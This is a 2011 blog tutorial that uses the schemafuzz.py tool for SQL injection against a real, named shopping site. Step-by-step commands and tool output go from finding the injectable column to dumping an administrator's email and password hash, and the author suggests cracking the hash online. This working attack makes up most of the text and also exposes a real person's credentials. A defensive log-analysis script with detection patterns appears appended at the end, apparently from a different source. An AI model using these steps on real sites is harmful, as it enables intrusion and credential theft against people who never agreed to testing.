Thursday, January 27, 2011

Tutorial: SQL injection hacking with schemafuzz

Writing about SQL injection with schemafuzz.py for documentation. Schemafuzz.py is a tool written in Python by rsauron@gmail.com. It is used to make SQL injection against a site easier, an instant way of doing it. I would still suggest learning manual SQL injection as well, so that we know what SQL injection is and how it works; gaining that knowledge is more important than anything else. For education and purpose only.

log in to our shell
then download schemafuzz.py directly from its site at darkc0de.com
[root@server1 ~]# wget http://darkc0de.com/others/schemafuzz.py
then make it executable
[root@server1 ~]# chmod +x schemafuzz.py
rename it so there is less to type later
[root@server1 ~]# mv schemafuzz.py falz.py
view the schemafuzz help
[root@server1 ~]# ./falz.py -h
the main options are the following: --schema, --dbs, --dump, --fuzz, --info, --full, --findcol
there is also -p for using a proxy and -o for saving the log output
1. find a target to test on our beloved Google

2. say I got the target http://en.pasen.it/product_detail.php?id=37

3. first we check in which column our target is vulnerable, using the schemafuzz option --findcol
[root@server1 ~]# ./falz.py -u http://en.pasen.it/product_detail.php?id=37 --findcol
[+] URL: http://en.pasen.it/product_detail.php?id=37--
[+] Evasion Used: "+" "--"
[+] 18:39:15
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,6,7,
[+] Column Length is: 8
[+] Found null column at column #: 1
[+] SQLi URL:http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7--
[+] darkc0de URL: http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7
[-] Done!
 
4. enter the darkc0de URL result from schemafuzz: http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7
[root@server1 ~]# ./falz.py -u http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7 --info
--info = to see the database name and the MySQL version in use
 
[+] URL: http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7--
[+] Evasion Used: "+" "--"
[+] 18:41:06
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
        Database: pasen
        User: cutefact_admin@localhost
        Version: 5.0.32-Debian_7etch6-log
[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5,6,7+FROM+mysql.user--
[+] Do we have Access to Load_File: No
[-] 18:41:08
[-] Total URL Requests 3
[-] Done
 
5. it happens to be using MySQL version 5.. so we can dump its databases and tables :D now let's look at where the tables and columns are, using the following command:
[root@server1 ~]#./falz.py -u http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7 --fuzz
[+] Number of tables names to be fuzzed: 338
[+] Number of column names to be fuzzed: 249
[+] Searching for tables and columns...
[!] Found a table called: mysql.user
[+] Now searching for columns inside table "mysql.user"
[!] Found a column called: user
[!] Found a column called: password
[-] Done searching inside table "mysql.user" for columns!
and so on.....
 
6. let's check how many databases the site has, using the --dbs option
[root@server1 ~]#./falz.py -u http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7 --dbs
[+] Gathering MySQL Server Configuration...
        Database: pasen
        User: cutefact_admin@localhost
        Version: 5.0.32-Debian_7etch6-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 11
[0] affiliatepro
[1] cutefact_db
[2] dutchpipe
[3] ecard_db
[4] ispcp
[5] magento_db
[6] mysql
[7] onionclub_db
[8] pasen
[9] syscp
[10] zen_pasen
[-] 18:43:49
[-] Total URL Requests 13
[-] Done
Don't forget to check schemafuzzlog.txt
 
7. wow, there are 11 databases... digging through them is going to take a while :D

8. then we look at the schema of each database one by one, with the option --schema -D (name of the database we want to see); I'll take the db named zen_pasen as an example
[root@server1 ~]# ./falz.py -u http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7 --schema -D zen_pasen -o pasen.txt
nb: -o pasen.txt saves our schemafuzz results to a file named pasen.txt (so it is easy to find later)

whoa... look at the results
[+] URL: http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7--
[+] Evasion Used: "+" "--"
[+] 18:46:28
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
        Database: pasen
        User: cutefact_admin@localhost
        Version: 5.0.32-Debian_7etch6-log
[+] Showing Tables & Columns from database "zen_pasen"
[+] Number of Tables: 97
[Database]: zen_pasen
[Table: Columns]
[0]address_book:
address_book_id,customers_id,entry_gender,entry_company,entry_firstname,entry_lastname,entry_street_address,entry_suburb,entry_postcode,entry_city,entry_state,entry_country_id,entry_zone_id,entry_vat,entry_cf
[1]address_format: address_format_id,address_format,address_summary
[2]admin: admin_id,admin_name,admin_email,admin_pass,admin_level
[3]admin_activity_log: log_id,access_date,admin_id,page_accessed,page_parameters,ip_address
[4]authorizenet: id,customer_id,order_id,response_code,response_text,authorization_type,transaction_id,sent,received,time,session_id
[5]banners:
banners_id,banners_title,banners_url,banners_image,banners_group,banners_html_text,expires_impressions,expires_date,date_scheduled,date_added,date_status_change,status,banners_open_new_windows,banners_on_ssl,banners_sort_order
[6]banners_history: banners_history_id,banners_id,banners_shown,banners_clicked,banners_history_date
 
 
9. we'll take just one table and column as an example.... feel free to dig through the rest yourself. look at the example above
[2]admin: admin_id,admin_name,admin_email,admin_pass,admin_level
that means the table is named admin and its column names are admin_id,admin_name,admin_email,admin_pass,admin_level
we use the format --dump -D (database name) -T (name of the table we want to dump) -C (column names)
[root@server1 ~]# ./falz.py -u http://en.pasen.it/product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7 --dump -D zen_pasen -T admin -C admin_id,admin_name,admin_email,admin_pass,admin_level
NoDataInColumn:1:zen_admin:christian.brandoni@gmail.com:5623cff30b4ffc5b114ac3abf9573c16:99:0:
[1] No data
[-] 18:55:24
[-] Total URL Requests 3
[-] Done
Don't forget to check pasen.txt
there you go.... the admin's email shows up along with the password, still encrypted.. just crack it on the online md5 cracker sites :D
don't forget to look at the rest of the log output in pasen.txt, who knows there is something else interesting in the log; we can use Tunnelier or WinSCP to retrieve the file from our server.
more frequent practice is needed so that we understand how to use schemafuzz better, and in many cases too.. SQL injection with schemafuzz does not give the result we want for that case.. manual SQL injection is still the best and most powerful to this day
nb: schemafuzz can also run on Windows after first installing Python on Windows; we can download Python here http://www.python.org/ftp/python/2.5.2/python-2.5.2.msi.
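From the defender's side, the probe URLs shown above (the AND 1=2 UNION SELECT column test, the darkc0de marker column, the read from mysql.user) are easy to spot in web-server access logs. This is an added example, not code from the original post or from schemafuzz: a small Python check that parses Apache combined-format log lines and tags each request with the probe signatures it matches. The log lines and source IPs are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Jan/2011:18:39:15 +0700] "GET /product_detail.php?id=37+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7-- HTTP/1.1" 200 5120 "-" "Python-urllib/2.5"
203.0.113.7 - - [27/Jan/2011:18:41:06 +0700] "GET /product_detail.php?id=37+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7-- HTTP/1.1" 200 5133 "-" "Python-urllib/2.5"
203.0.113.7 - - [27/Jan/2011:18:41:07 +0700] "GET /product_detail.php?id=37+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5,6,7+FROM+mysql.user-- HTTP/1.1" 200 5160 "-" "Python-urllib/2.5"
198.51.100.9 - - [27/Jan/2011:18:42:00 +0700] "GET /product_detail.php?id=37 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# ip, timestamp, method, request path and status code from a combined-format line
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures of the UNION-based probes, matched on the decoded query string.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),
    "tautology_probe": re.compile(r"\b(?:and|or)\b\s*1\s*=\s*[12]\b", re.I),
    "darkc0de_marker": re.compile(r"darkc0de", re.I),
    "mysql_user_read": re.compile(r"\bfrom\s+mysql\.user\b", re.I),
    "comment_terminator": re.compile(r"--\s*$|#\s*$"),
}


def analyze(log_text):
    """Return (findings per matching line, number of hits per source IP)."""
    findings, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        # Decode '+' and %xx so the query reads as the database layer would see it.
        query = unquote_plus(m.group("path")).partition("?")[2]
        tags = [name for name, rx in SIGNATURES.items() if rx.search(query)]
        if tags:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "status": int(m.group("status")), "tags": tags})
            per_ip[m.group("ip")] += 1
    return findings, per_ip


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG)[0]:
        print(f["ts"], f["ip"], f["status"], ",".join(f["tags"]))
```

A 200 status on a tagged request is the line worth looking at: it means the injected SELECT was accepted rather than rejected by the application.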
